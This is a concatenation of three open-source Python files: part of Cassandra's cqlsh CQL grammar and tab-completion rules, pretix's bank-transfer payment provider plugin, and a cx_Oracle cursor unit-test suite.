    """Offer +/- only when the assigned column is a counter."""
    layout = get_table_meta(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('updatecol', ''))
    if layout.columns[colname].cql_type != 'counter':
        return []
    return ['+', '-']
@completer_for('assignment', 'inc')
def update_counter_inc_completer(ctxt, cass):
    """Hint at an integer increment when updating a counter column."""
    layout = get_table_meta(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('updatecol', ''))
    is_counter = layout.columns[colname].cql_type == 'counter'
    return [Hint('<wholenumber>')] if is_counter else []
@completer_for('assignment', 'listadder')
def update_listadder_completer(ctxt, cass):
    """Offer '+' (list concatenation) when the RHS is a list literal."""
    return ['+'] if ctxt.get_binding('update_rhs').startswith('[') else []
@completer_for('assignment', 'listcol')
def update_listcol_completer(ctxt, cass):
    """After "col = [..] +", suggest the same list column again."""
    if not ctxt.get_binding('update_rhs').startswith('['):
        return []
    colname = dequote_name(ctxt.get_binding('updatecol'))
    return [maybe_escape_name(colname)]
@completer_for('assignment', 'indexbracket')
def update_indexbracket_completer(ctxt, cass):
    """Offer '[' for element assignment on map/list columns."""
    layout = get_table_meta(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('updatecol', ''))
    return ['['] if layout.columns[colname].cql_type in ('map', 'list') else []
@completer_for('assignment', 'udt_field_dot')
def update_udt_field_dot_completer(ctxt, cass):
    """Offer '.' for field assignment on user-defined-type columns."""
    layout = get_table_meta(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('updatecol', ''))
    if _is_usertype(layout, colname):
        return ["."]
    return []
@completer_for('assignment', 'udt_field')
def assignment_udt_field_completer(ctxt, cass):
    """Complete the field name after "udtcol." in a SET assignment."""
    layout = get_table_meta(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('updatecol', ''))
    return _usertype_fields(ctxt, cass, layout, colname)
def _is_usertype(layout, curcol):
    """True when *curcol* holds a user-defined type (not primitive/collection)."""
    cql_type = layout.columns[curcol].cql_type
    if cql_type in simple_cql_types:
        return False
    return cql_type not in ('map', 'set', 'list')
def _usertype_fields(ctxt, cass, layout, curcol):
    """Return the field names of the user type stored in column *curcol*."""
    if not _is_usertype(layout, curcol):
        return []
    type_name = layout.columns[curcol].cql_type
    ks = ctxt.get_binding('ksname', None)
    if ks is not None:
        ks = dequote_name(ks)
    # get_usertype_layout yields (field_name, field_type) pairs.
    return [field_name
            for field_name, _field_type in cass.get_usertype_layout(ks, type_name)]
@completer_for('condition', 'indexbracket')
def condition_indexbracket_completer(ctxt, cass):
    """Offer '[' for element access on map/list columns in IF conditions."""
    layout = get_table_meta(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('conditioncol', ''))
    return ['['] if layout.columns[colname].cql_type in ('map', 'list') else []
@completer_for('condition', 'udt_field_dot')
def condition_udt_field_dot_completer(ctxt, cass):
    """Offer '.' for UDT field access in IF conditions."""
    layout = get_table_meta(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('conditioncol', ''))
    if _is_usertype(layout, colname):
        return ["."]
    return []
@completer_for('condition', 'udt_field')
def condition_udt_field_completer(ctxt, cass):
    """Complete the field name after "udtcol." in an IF condition."""
    layout = get_table_meta(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('conditioncol', ''))
    return _usertype_fields(ctxt, cass, layout, colname)
syntax_rules += r'''
<deleteStatement> ::= "DELETE" ( <deleteSelector> ( "," <deleteSelector> )* )?
"FROM" cf=<columnFamilyName>
( "USING" [delopt]=<deleteOption> )?
"WHERE" <whereClause>
( "IF" ( "EXISTS" | <conditions> ) )?
;
<deleteSelector> ::= delcol=<cident>
( ( "[" <term> "]" )
| ( "." <identifier> ) )?
;
<deleteOption> ::= "TIMESTAMP" <wholenumber>
;
'''
@completer_for('deleteStatement', 'delopt')
def delete_opt_completer(ctxt, cass):
    """Offer the DELETE USING options (only TIMESTAMP) not already used."""
    remaining = set(['TIMESTAMP'])
    for used in ctxt.get_binding('delopt', ()):
        remaining.discard(used.split()[0])
    return remaining
@completer_for('deleteSelector', 'delcol')
def delete_delcol_completer(ctxt, cass):
    """Complete a deletable column: any non-primary-key column."""
    table_meta = get_table_meta(ctxt, cass)
    return [maybe_escape_name(c) for c in regular_column_names(table_meta)]
syntax_rules += r'''
<batchStatement> ::= "BEGIN" ( "UNLOGGED" | "COUNTER" )? "BATCH"
( "USING" [batchopt]=<usingOption>
( "AND" [batchopt]=<usingOption> )* )?
[batchstmt]=<batchStatementMember> ";"?
( [batchstmt]=<batchStatementMember> ";"? )*
"APPLY" "BATCH"
;
<batchStatementMember> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
;
'''
@completer_for('batchStatement', 'batchopt')
def batch_opt_completer(ctxt, cass):
    """Offer the BATCH USING options (only TIMESTAMP) not already used."""
    remaining = set(['TIMESTAMP'])
    for used in ctxt.get_binding('batchopt', ()):
        remaining.discard(used.split()[0])
    return remaining
syntax_rules += r'''
<truncateStatement> ::= "TRUNCATE" ("COLUMNFAMILY" | "TABLE")? cf=<columnFamilyName>
;
'''
syntax_rules += r'''
<createKeyspaceStatement> ::= "CREATE" wat=( "KEYSPACE" | "SCHEMA" ) ("IF" "NOT" "EXISTS")? ksname=<cfOrKsName>
"WITH" <property> ( "AND" <property> )*
;
'''
@completer_for('createKeyspaceStatement', 'wat')
def create_ks_wat_completer(ctxt, cass):
    """Prefer the KEYSPACE spelling; accept SCHEMA once the user starts typing."""
    # "SCHEMA" is a deprecated synonym, so don't suggest it unprompted.
    if ctxt.get_binding('partial', '') != '':
        return ['KEYSPACE', 'SCHEMA']
    return ['KEYSPACE']
syntax_rules += r'''
<createColumnFamilyStatement> ::= "CREATE" wat=( "COLUMNFAMILY" | "TABLE" ) ("IF" "NOT" "EXISTS")?
( ks=<nonSystemKeyspaceName> dot="." )? cf=<cfOrKsName>
"(" ( <singleKeyCfSpec> | <compositeKeyCfSpec> ) ")"
( "WITH" <cfamProperty> ( "AND" <cfamProperty> )* )?
;
<cfamProperty> ::= <property>
| "COMPACT" "STORAGE" "CDC"
| "CLUSTERING" "ORDER" "BY" "(" <cfamOrdering>
( "," <cfamOrdering> )* ")"
;
<cfamOrdering> ::= [ordercol]=<cident> ( "ASC" | "DESC" )
;
<singleKeyCfSpec> ::= [newcolname]=<cident> <storageType> "PRIMARY" "KEY"
( "," [newcolname]=<cident> <storageType> )*
;
<compositeKeyCfSpec> ::= [newcolname]=<cident> <storageType>
"," [newcolname]=<cident> <storageType> ( "static" )?
( "," [newcolname]=<cident> <storageType> ( "static" )? )*
"," "PRIMARY" k="KEY" p="(" ( partkey=<pkDef> | [pkey]=<cident> )
( c="," [pkey]=<cident> )* ")"
;
<pkDef> ::= "(" [ptkey]=<cident> "," [ptkey]=<cident>
( "," [ptkey]=<cident> )* ")"
;
'''
@completer_for('cfamOrdering', 'ordercol')
def create_cf_clustering_order_colname_completer(ctxt, cass):
    """Suggest declared column names for CLUSTERING ORDER BY."""
    # Not every declared column is a legal ordering column, but the parse
    # context doesn't tell us which ones are; offer them all.
    return [dequote_name(name) for name in ctxt.get_binding('newcolname', ())]
@completer_for('createColumnFamilyStatement', 'wat')
def create_cf_wat_completer(ctxt, cass):
    """Prefer the TABLE spelling; accept COLUMNFAMILY once typing has begun."""
    # "COLUMNFAMILY" is legacy nomenclature, so don't suggest it unprompted.
    if ctxt.get_binding('partial', '') != '':
        return ['TABLE', 'COLUMNFAMILY']
    return ['TABLE']
# These positions name new identifiers, so they only get explanatory hints.
explain_completion('createColumnFamilyStatement', 'cf', '<new_table_name>')
explain_completion('compositeKeyCfSpec', 'newcolname', '<new_column_name>')
@completer_for('createColumnFamilyStatement', 'dot')
def create_cf_ks_dot_completer(ctxt, cass):
    """Offer the '.' separator only when the typed keyspace actually exists."""
    ksname = dequote_name(ctxt.get_binding('ks'))
    return ['.'] if ksname in cass.get_keyspace_names() else []
@completer_for('pkDef', 'ptkey')
def create_cf_pkdef_declaration_completer(ctxt, cass):
    """Suggest the next declared column as a composite-partition-key part.

    Columns already used in the key are skipped, and the last declared
    column is never offered (at least one column must remain for the rest
    of the primary key).
    """
    cols_declared = ctxt.get_binding('newcolname')
    pieces_already = map(dequote_name, ctxt.get_binding('ptkey', ()))
    # Guard against running out of declared columns entirely; the previous
    # version raised IndexError when every column was already used.
    while cols_declared and cols_declared[0] in pieces_already:
        cols_declared = cols_declared[1:]
    if len(cols_declared) < 2:
        return ()
    return [maybe_escape_name(cols_declared[0])]
@completer_for('compositeKeyCfSpec', 'pkey')
def create_cf_composite_key_declaration_completer(ctxt, cass):
    """Suggest the next declared column as a primary-key component.

    Skips columns already used in the partition or clustering parts, and
    never offers the final declared column.
    """
    cols_declared = ctxt.get_binding('newcolname')
    pieces_already = ctxt.get_binding('ptkey', ()) + ctxt.get_binding('pkey', ())
    pieces_already = map(dequote_name, pieces_already)
    # Guard against exhausting the declared columns; the previous version
    # raised IndexError when every column was already used.
    while cols_declared and cols_declared[0] in pieces_already:
        cols_declared = cols_declared[1:]
    if len(cols_declared) < 2:
        return ()
    return [maybe_escape_name(cols_declared[0])]
@completer_for('compositeKeyCfSpec', 'k')
def create_cf_composite_primary_key_keyword_completer(ctxt, cass):
    """After PRIMARY, complete the KEY keyword with its opening paren."""
    return ['KEY (']
@completer_for('compositeKeyCfSpec', 'p')
def create_cf_composite_primary_key_paren_completer(ctxt, cass):
    """Complete the opening paren of a composite PRIMARY KEY."""
    return ['(']
@completer_for('compositeKeyCfSpec', 'c')
def create_cf_composite_primary_key_comma_completer(ctxt, cass):
    """Offer ',' while declared columns remain for the primary key."""
    declared = ctxt.get_binding('newcolname')
    used = ctxt.get_binding('pkey', ())
    if len(used) >= len(declared) - 1:
        return ()
    return [',']
syntax_rules += r'''
<idxName> ::= <identifier>
| <quotedName>
| <unreservedKeyword>;
<createIndexStatement> ::= "CREATE" "CUSTOM"? "INDEX" ("IF" "NOT" "EXISTS")? indexname=<idxName>? "ON"
cf=<columnFamilyName> "(" (
col=<cident> |
"keys(" col=<cident> ")" |
"full(" col=<cident> ")"
) ")"
( "USING" <stringLiteral> ( "WITH" "OPTIONS" "=" <mapLiteral> )? )?
;
<createMaterializedViewStatement> ::= "CREATE" "MATERIALIZED" "VIEW" ("IF" "NOT" "EXISTS")? <materializedViewName>?
"AS" <selectStatement>
"PRIMARY" "KEY" <pkDef>
;
<createUserTypeStatement> ::= "CREATE" "TYPE" ( ks=<nonSystemKeyspaceName> dot="." )? typename=<cfOrKsName> "(" newcol=<cident> <storageType>
( "," [newcolname]=<cident> <storageType> )*
")"
;
<createFunctionStatement> ::= "CREATE" ("OR" "REPLACE")? "FUNCTION"
("IF" "NOT" "EXISTS")?
<userFunctionName>
( "(" ( newcol=<cident> <storageType>
( "," [newcolname]=<cident> <storageType> )* )?
")" )?
("RETURNS" "NULL" | "CALLED") "ON" "NULL" "INPUT"
"RETURNS" <storageType>
"LANGUAGE" <cident> "AS" <stringLiteral>
;
<createAggregateStatement> ::= "CREATE" ("OR" "REPLACE")? "AGGREGATE"
("IF" "NOT" "EXISTS")?
<userAggregateName>
( "("
( <storageType> ( "," <storageType> )* )?
")" )?
"SFUNC" <refUserFunctionName>
"STYPE" <storageType>
( "FINALFUNC" <refUserFunctionName> )?
( "INITCOND" <term> )?
;
'''
explain_completion('createIndexStatement', 'indexname', '<new_index_name>')
explain_completion('createUserTypeStatement', 'typename', '<new_type_name>')
explain_completion('createUserTypeStatement', 'newcol', '<new_field_name>')
@completer_for('createIndexStatement', 'col')
def create_index_col_completer(ctxt, cass):
    """Return the columns for which an index doesn't exist yet."""
    layout = get_table_meta(ctxt, cass)
    indexed = set(idx.index_options["target"]
                  for idx in layout.indexes.itervalues())
    candidates = [col.name for col in layout.columns.values()
                  if col.name not in indexed]
    return map(maybe_escape_name, candidates)
syntax_rules += r'''
<dropKeyspaceStatement> ::= "DROP" "KEYSPACE" ("IF" "EXISTS")? ksname=<nonSystemKeyspaceName>
;
<dropColumnFamilyStatement> ::= "DROP" ( "COLUMNFAMILY" | "TABLE" ) ("IF" "EXISTS")? cf=<columnFamilyName>
;
<indexName> ::= ( ksname=<idxOrKsName> dot="." )? idxname=<idxOrKsName> ;
<idxOrKsName> ::= <identifier>
| <quotedName>
| <unreservedKeyword>;
<dropIndexStatement> ::= "DROP" "INDEX" ("IF" "EXISTS")? idx=<indexName>
;
<dropMaterializedViewStatement> ::= "DROP" "MATERIALIZED" "VIEW" ("IF" "EXISTS")? mv=<materializedViewName>
;
<dropUserTypeStatement> ::= "DROP" "TYPE" ut=<userTypeName>
;
<dropFunctionStatement> ::= "DROP" "FUNCTION" ( "IF" "EXISTS" )? <userFunctionName>
;
<dropAggregateStatement> ::= "DROP" "AGGREGATE" ( "IF" "EXISTS" )? <userAggregateName>
;
'''
@completer_for('indexName', 'ksname')
def idx_ks_name_completer(ctxt, cass):
    """Complete a keyspace qualifier (with trailing dot) for an index name."""
    return ['%s.' % maybe_escape_name(ks) for ks in cass.get_keyspace_names()]
@completer_for('indexName', 'dot')
def idx_ks_dot_completer(ctxt, cass):
    """Offer '.' only when the typed keyspace exists."""
    ksname = dequote_name(ctxt.get_binding('ksname'))
    return ['.'] if ksname in cass.get_keyspace_names() else []
@completer_for('indexName', 'idxname')
def idx_ks_idx_name_completer(ctxt, cass):
    """Complete index names, scoped to the bound keyspace when one was typed."""
    ks = ctxt.get_binding('ksname', None)
    if ks is not None:
        ks = dequote_name(ks)
    try:
        idxnames = cass.get_index_names(ks)
    except Exception:
        # With no explicit keyspace we may simply not be USEing one yet;
        # in that case there is nothing to offer.  Otherwise re-raise.
        if ks is None:
            return ()
        raise
    return map(maybe_escape_name, idxnames)
syntax_rules += r'''
<alterTableStatement> ::= "ALTER" wat=( "COLUMNFAMILY" | "TABLE" ) cf=<columnFamilyName>
<alterInstructions>
;
<alterInstructions> ::= "ALTER" existcol=<cident> "TYPE" <storageType>
| "ADD" newcol=<cident> <storageType> ("static")?
| "DROP" existcol=<cident>
| "WITH" <cfamProperty> ( "AND" <cfamProperty> )*
| "RENAME" existcol=<cident> "TO" newcol=<cident>
( "AND" existcol=<cident> "TO" newcol=<cident> )*
;
<alterUserTypeStatement> ::= "ALTER" "TYPE" ut=<userTypeName>
<alterTypeInstructions>
;
<alterTypeInstructions> ::= "ALTER" existcol=<cident> "TYPE" <storageType>
| "ADD" newcol=<cident> <storageType>
| "RENAME" existcol=<cident> "TO" newcol=<cident>
( "AND" existcol=<cident> "TO" newcol=<cident> )*
;
'''
@completer_for('alterInstructions', 'existcol')
def alter_table_col_completer(ctxt, cass):
    """Complete an existing column name for ALTER TABLE."""
    layout = get_table_meta(ctxt, cass)
    return [maybe_escape_name(str(col)) for col in layout.columns]
@completer_for('alterTypeInstructions', 'existcol')
def alter_type_field_completer(ctxt, cass):
    """Complete an existing field name for ALTER TYPE."""
    layout = get_ut_layout(ctxt, cass)
    # Each entry is a (field_name, field_type) pair; the previous code
    # shadowed the builtin `tuple` as its loop variable.
    fields = [field[0] for field in layout]
    return map(maybe_escape_name, fields)
explain_completion('alterInstructions', 'newcol', '<new_column_name>')
explain_completion('alterTypeInstructions', 'newcol', '<new_field_name>')
syntax_rules += r'''
<alterKeyspaceStatement> ::= "ALTER" wat=( "KEYSPACE" | "SCHEMA" ) ks=<alterableKeyspaceName>
"WITH" <property> ( "AND" <property> )*
;
'''
syntax_rules += r'''
<username> ::= name=( <identifier> | <stringLiteral> )
;
<createUserStatement> ::= "CREATE" "USER" ( "IF" "NOT" "EXISTS" )? <username>
( "WITH" "PASSWORD" <stringLiteral> )?
( "SUPERUSER" | "NOSUPERUSER" )?
;
<alterUserStatement> ::= "ALTER" "USER" <username>
( "WITH" "PASSWORD" <stringLiteral> )?
( "SUPERUSER" | "NOSUPERUSER" )?
;
<dropUserStatement> ::= "DROP" "USER" ( "IF" "EXISTS" )? <username>
;
<listUsersStatement> ::= "LIST" "USERS"
;
'''
syntax_rules += r'''
<rolename> ::= <identifier>
| <quotedName>
| <unreservedKeyword>
;
<createRoleStatement> ::= "CREATE" "ROLE" <rolename>
( "WITH" <roleProperty> ("AND" <roleProperty>)*)?
;
<alterRoleStatement> ::= "ALTER" "ROLE" <rolename>
( "WITH" <roleProperty> ("AND" <roleProperty>)*)?
;
<roleProperty> ::= "PASSWORD" "=" <stringLiteral>
| "OPTIONS" "=" <mapLiteral>
| "SUPERUSER" "=" <boolean>
| "LOGIN" "=" <boolean>
;
<dropRoleStatement> ::= "DROP" "ROLE" <rolename>
;
<grantRoleStatement> ::= "GRANT" <rolename> "TO" <rolename>
;
<revokeRoleStatement> ::= "REVOKE" <rolename> "FROM" <rolename>
;
<listRolesStatement> ::= "LIST" "ROLES"
( "OF" <rolename> )? "NORECURSIVE"?
;
'''
syntax_rules += r'''
<grantStatement> ::= "GRANT" <permissionExpr> "ON" <resource> "TO" <rolename>
;
<revokeStatement> ::= "REVOKE" <permissionExpr> "ON" <resource> "FROM" <rolename>
;
<listPermissionsStatement> ::= "LIST" <permissionExpr>
( "ON" <resource> )? ( "OF" <rolename> )? "NORECURSIVE"?
;
<permission> ::= "AUTHORIZE"
| "CREATE"
| "ALTER"
| "DROP"
| "SELECT"
| "MODIFY"
| "DESCRIBE"
| "EXECUTE"
;
<permissionExpr> ::= ( <permission> "PERMISSION"? )
| ( "ALL" "PERMISSIONS"? )
;
<resource> ::= <dataResource>
| <roleResource>
| <functionResource>
| <jmxResource>
;
<dataResource> ::= ( "ALL" "KEYSPACES" )
| ( "KEYSPACE" <keyspaceName> )
| ( "TABLE"? <columnFamilyName> )
;
<roleResource> ::= ("ALL" "ROLES")
| ("ROLE" <rolename>)
;
<functionResource> ::= ( "ALL" "FUNCTIONS" ("IN KEYSPACE" <keyspaceName>)? )
| ( "FUNCTION" <functionAggregateName>
( "(" ( newcol=<cident> <storageType>
( "," [newcolname]=<cident> <storageType> )* )?
")" )
)
;
<jmxResource> ::= ( "ALL" "MBEANS")
| ( ( "MBEAN" | "MBEANS" ) <stringLiteral> )
;
'''
@completer_for('username', 'name')
def username_name_completer(ctxt, cass):
    """Complete existing usernames (quoted when needed); hint on CREATE USER."""
    def quote_if_needed(name):
        if CqlRuleSet.is_valid_cql3_name(name):
            return name
        return "'%s'" % name
    # For CREATE USER the name is new, so completion makes no sense.
    if ctxt.matched[0][1].upper() == 'CREATE':
        return [Hint('<username>')]
    rows = cass.session.execute("LIST USERS")
    return [quote_if_needed(row.values()[0].replace("'", "''")) for row in rows]
@completer_for('rolename', 'role')
def rolename_completer(ctxt, cass):
    """Complete existing role names (quoted when needed); hint on CREATE ROLE."""
    def quote_if_needed(name):
        if CqlRuleSet.is_valid_cql3_name(name):
            return name
        return "'%s'" % name
    # For CREATE ROLE the name is new, so completion makes no sense.
    if ctxt.matched[0][1].upper() == 'CREATE':
        return [Hint('<rolename>')]
    rows = cass.session.execute("LIST ROLES")
    return [quote_if_needed(row[0].replace("'", "''")) for row in rows]
syntax_rules += r'''
<createTriggerStatement> ::= "CREATE" "TRIGGER" ( "IF" "NOT" "EXISTS" )? <cident>
"ON" cf=<columnFamilyName> "USING" class=<stringLiteral>
;
<dropTriggerStatement> ::= "DROP" "TRIGGER" ( "IF" "EXISTS" )? triggername=<cident>
"ON" cf=<columnFamilyName>
;
'''
explain_completion('createTriggerStatement', 'class', '\'fully qualified class name\'')
def get_trigger_names(ctxt, cass):
    """Return trigger names, scoped to the bound keyspace if one was given."""
    ks = ctxt.get_binding('ksname', None)
    return cass.get_trigger_names(dequote_name(ks) if ks is not None else None)
@completer_for('dropTriggerStatement', 'triggername')
def drop_trigger_completer(ctxt, cass):
    """Complete the name of an existing trigger for DROP TRIGGER."""
    return map(maybe_escape_name, get_trigger_names(ctxt, cass))
# END SYNTAX/COMPLETION RULE DEFINITIONS

# Register all grammar rules accumulated above with the shared rule set.
CqlRuleSet.append_rules(syntax_rules)
| mambocab/cassandra | pylib/cqlshlib/cql3handling.py | Python | apache-2.0 | 55,793 |
import json
from collections import OrderedDict
from django import forms
from django.template.loader import get_template
from django.utils.translation import ugettext_lazy as _
from pretix.base.payment import BasePaymentProvider
class BankTransfer(BasePaymentProvider):
    """Payment provider that asks the customer to wire the money manually."""

    identifier = 'banktransfer'
    verbose_name = _('Bank transfer')

    @property
    def settings_form_fields(self):
        # Extend the provider's generic settings with the bank account
        # details that will be shown to the customer.
        bank_details_field = forms.CharField(
            widget=forms.Textarea,
            label=_('Bank account details'),
        )
        fields = list(super().settings_form_fields.items())
        fields.append(('bank_details', bank_details_field))
        return OrderedDict(fields)

    def payment_form_render(self, request) -> str:
        tpl = get_template('pretixplugins/banktransfer/checkout_payment_form.html')
        return tpl.render({
            'request': request,
            'event': self.event,
            'settings': self.settings,
        })

    def checkout_prepare(self, request, total):
        # Nothing needs to be collected from the customer at checkout time.
        return True

    def payment_is_valid_session(self, request):
        return True

    def checkout_confirm_render(self, request):
        tpl = get_template('pretixplugins/banktransfer/checkout_payment_confirm.html')
        return tpl.render({
            'request': request,
            'form': self.payment_form(request),
            'settings': self.settings,
        })

    def order_pending_mail_render(self, order) -> str:
        tpl = get_template('pretixplugins/banktransfer/email/order_pending.txt')
        return tpl.render({
            'event': self.event,
            'order': order,
            'settings': self.settings,
        })

    def order_pending_render(self, request, order) -> str:
        tpl = get_template('pretixplugins/banktransfer/pending.html')
        return tpl.render({
            'request': request,
            'order': order,
            'settings': self.settings,
        })

    def order_control_render(self, request, order) -> str:
        # payment_info is stored as a JSON blob on the order, if at all.
        payment_info = json.loads(order.payment_info) if order.payment_info else None
        tpl = get_template('pretixplugins/banktransfer/control.html')
        return tpl.render({
            'request': request,
            'event': self.event,
            'settings': self.settings,
            'payment_info': payment_info,
            'order': order,
        })
| akuks/pretix | src/pretix/plugins/banktransfer/payment.py | Python | apache-2.0 | 2,341 |
"""Module for testing cursor objects."""
import cx_Oracle
class TestCursor(BaseTestCase):
    """Tests for cursor objects against a live Oracle schema (unicode API).

    Relies on fixtures created by the test setup: the TestNumbers and
    TestExecuteMany tables and the proc_Test*/func_Test* stored routines.
    """

    def testExecuteNoArgs(self):
        """test executing a statement without any arguments"""
        result = self.cursor.execute(u"begin null; end;")
        self.failUnlessEqual(result, None)

    def testExecuteNoStatementWithArgs(self):
        """test executing a None statement with bind variables"""
        self.failUnlessRaises(cx_Oracle.ProgrammingError, self.cursor.execute,
                None, x = 5)

    def testExecuteEmptyKeywordArgs(self):
        """test executing a statement with args and empty keyword args"""
        simpleVar = self.cursor.var(cx_Oracle.NUMBER)
        args = [simpleVar]
        kwArgs = {}
        result = self.cursor.execute(u"begin :1 := 25; end;", args, **kwArgs)
        self.failUnlessEqual(result, None)
        self.failUnlessEqual(simpleVar.getvalue(), 25)

    def testExecuteKeywordArgs(self):
        """test executing a statement with keyword arguments"""
        simpleVar = self.cursor.var(cx_Oracle.NUMBER)
        result = self.cursor.execute(u"begin :value := 5; end;",
                value = simpleVar)
        self.failUnlessEqual(result, None)
        self.failUnlessEqual(simpleVar.getvalue(), 5)

    def testExecuteDictionaryArg(self):
        """test executing a statement with a dictionary argument"""
        simpleVar = self.cursor.var(cx_Oracle.NUMBER)
        dictArg = { u"value" : simpleVar }
        result = self.cursor.execute(u"begin :value := 10; end;", dictArg)
        self.failUnlessEqual(result, None)
        self.failUnlessEqual(simpleVar.getvalue(), 10)

    def testExecuteMultipleMethod(self):
        """test executing a statement with both a dict arg and keyword args"""
        # mixing both bind styles in one call must be rejected
        simpleVar = self.cursor.var(cx_Oracle.NUMBER)
        dictArg = { u"value" : simpleVar }
        self.failUnlessRaises(cx_Oracle.InterfaceError, self.cursor.execute,
                u"begin :value := 15; end;", dictArg, value = simpleVar)

    def testExecuteAndModifyArraySize(self):
        """test executing a statement and then changing the array size"""
        self.cursor.execute(u"select IntCol from TestNumbers")
        self.cursor.arraysize = 20
        self.failUnlessEqual(len(self.cursor.fetchall()), 10)

    def testCallProc(self):
        """test executing a stored procedure"""
        var = self.cursor.var(cx_Oracle.NUMBER)
        results = self.cursor.callproc(u"proc_Test", (u"hi", 5, var))
        self.failUnlessEqual(results, [u"hi", 10, 2.0])

    def testCallProcNoArgs(self):
        """test executing a stored procedure without any arguments"""
        results = self.cursor.callproc(u"proc_TestNoArgs")
        self.failUnlessEqual(results, [])

    def testCallFunc(self):
        """test executing a stored function"""
        results = self.cursor.callfunc(u"func_Test", cx_Oracle.NUMBER,
                (u"hi", 5))
        self.failUnlessEqual(results, 7)

    def testCallFuncNoArgs(self):
        """test executing a stored function without any arguments"""
        results = self.cursor.callfunc(u"func_TestNoArgs", cx_Oracle.NUMBER)
        self.failUnlessEqual(results, 712)

    def testExecuteManyByName(self):
        """test executing a statement multiple times (named args)"""
        self.cursor.execute(u"truncate table TestExecuteMany")
        rows = [ { u"value" : n } for n in range(250) ]
        self.cursor.arraysize = 100
        statement = u"insert into TestExecuteMany (IntCol) values (:value)"
        self.cursor.executemany(statement, rows)
        self.connection.commit()
        self.cursor.execute(u"select count(*) from TestExecuteMany")
        count, = self.cursor.fetchone()
        self.failUnlessEqual(count, len(rows))

    def testExecuteManyByPosition(self):
        """test executing a statement multiple times (positional args)"""
        self.cursor.execute(u"truncate table TestExecuteMany")
        rows = [ [n] for n in range(230) ]
        self.cursor.arraysize = 100
        statement = u"insert into TestExecuteMany (IntCol) values (:1)"
        self.cursor.executemany(statement, rows)
        self.connection.commit()
        self.cursor.execute(u"select count(*) from TestExecuteMany")
        count, = self.cursor.fetchone()
        self.failUnlessEqual(count, len(rows))

    def testExecuteManyWithPrepare(self):
        """test executing a statement multiple times (with prepare)"""
        self.cursor.execute(u"truncate table TestExecuteMany")
        rows = [ [n] for n in range(225) ]
        self.cursor.arraysize = 100
        statement = u"insert into TestExecuteMany (IntCol) values (:1)"
        self.cursor.prepare(statement)
        # passing None reuses the previously prepared statement
        self.cursor.executemany(None, rows)
        self.connection.commit()
        self.cursor.execute(u"select count(*) from TestExecuteMany")
        count, = self.cursor.fetchone()
        self.failUnlessEqual(count, len(rows))

    def testExecuteManyWithRebind(self):
        """test executing a statement multiple times (with rebind)"""
        self.cursor.execute(u"truncate table TestExecuteMany")
        rows = [ [n] for n in range(235) ]
        self.cursor.arraysize = 100
        statement = u"insert into TestExecuteMany (IntCol) values (:1)"
        self.cursor.executemany(statement, rows[:50])
        self.cursor.executemany(statement, rows[50:])
        self.connection.commit()
        self.cursor.execute(u"select count(*) from TestExecuteMany")
        count, = self.cursor.fetchone()
        self.failUnlessEqual(count, len(rows))

    # NOTE: method name has a typo ("Execption"); kept for compatibility
    # with any tooling that selects tests by name.
    def testExecuteManyWithExecption(self):
        """test executing a statement multiple times (with exception)"""
        self.cursor.execute(u"truncate table TestExecuteMany")
        # the duplicate value (2) violates the primary key on the 4th row
        rows = [ { u"value" : n } for n in (1, 2, 3, 2, 5) ]
        statement = u"insert into TestExecuteMany (IntCol) values (:value)"
        self.failUnlessRaises(cx_Oracle.DatabaseError, self.cursor.executemany,
                statement, rows)
        self.failUnlessEqual(self.cursor.rowcount, 3)

    def testPrepare(self):
        """test preparing a statement and executing it multiple times"""
        self.failUnlessEqual(self.cursor.statement, None)
        statement = u"begin :value := :value + 5; end;"
        self.cursor.prepare(statement)
        var = self.cursor.var(cx_Oracle.NUMBER)
        self.failUnlessEqual(self.cursor.statement, statement)
        var.setvalue(0, 2)
        self.cursor.execute(None, value = var)
        self.failUnlessEqual(var.getvalue(), 7)
        self.cursor.execute(None, value = var)
        self.failUnlessEqual(var.getvalue(), 12)
        self.cursor.execute(u"begin :value2 := 3; end;", value2 = var)
        self.failUnlessEqual(var.getvalue(), 3)

    def testExceptionOnClose(self):
        "confirm an exception is raised after closing a cursor"
        self.cursor.close()
        self.failUnlessRaises(cx_Oracle.InterfaceError, self.cursor.execute,
                u"select 1 from dual")

    def testIterators(self):
        """test iterators"""
        self.cursor.execute(u"""
                select IntCol
                from TestNumbers
                where IntCol between 1 and 3
                order by IntCol""")
        rows = []
        for row in self.cursor:
            rows.append(row[0])
        self.failUnlessEqual(rows, [1, 2, 3])

    def testIteratorsInterrupted(self):
        """test iterators (with intermediate execute)"""
        # re-executing invalidates an in-progress iteration
        self.cursor.execute(u"truncate table TestExecuteMany")
        self.cursor.execute(u"""
                select IntCol
                from TestNumbers
                where IntCol between 1 and 3
                order by IntCol""")
        testIter = iter(self.cursor)
        value, = testIter.next()
        self.cursor.execute(u"insert into TestExecuteMany (IntCol) values (1)")
        self.failUnlessRaises(cx_Oracle.InterfaceError, testIter.next)

    def testBindNames(self):
        """test that bindnames() works correctly."""
        self.failUnlessRaises(cx_Oracle.ProgrammingError,
                self.cursor.bindnames)
        self.cursor.prepare(u"begin null; end;")
        self.failUnlessEqual(self.cursor.bindnames(), [])
        self.cursor.prepare(u"begin :retval := :inval + 5; end;")
        self.failUnlessEqual(self.cursor.bindnames(), ["RETVAL", "INVAL"])
        self.cursor.prepare(u"begin :retval := :a * :a + :b * :b; end;")
        self.failUnlessEqual(self.cursor.bindnames(), ["RETVAL", "A", "B"])
        self.cursor.prepare(u"begin :a := :b + :c + :d + :e + :f + :g + " + \
                ":h + :i + :j + :k + :l; end;")
        self.failUnlessEqual(self.cursor.bindnames(),
                [u"A", u"B", u"C", u"D", u"E", u"F", u"G", u"H", u"I", u"J",
                 u"K", u"L"])

    def testBadPrepare(self):
        """test that subsequent executes succeed after bad prepare"""
        self.failUnlessRaises(cx_Oracle.DatabaseError,
                self.cursor.execute,
                u"begin raise_application_error(-20000, 'this); end;")
        self.cursor.execute(u"begin null; end;")

    def testBadExecute(self):
        """test that subsequent fetches fail after bad execute"""
        self.failUnlessRaises(cx_Oracle.DatabaseError,
                self.cursor.execute, u"select y from dual")
        self.failUnlessRaises(cx_Oracle.InterfaceError,
                self.cursor.fetchall)
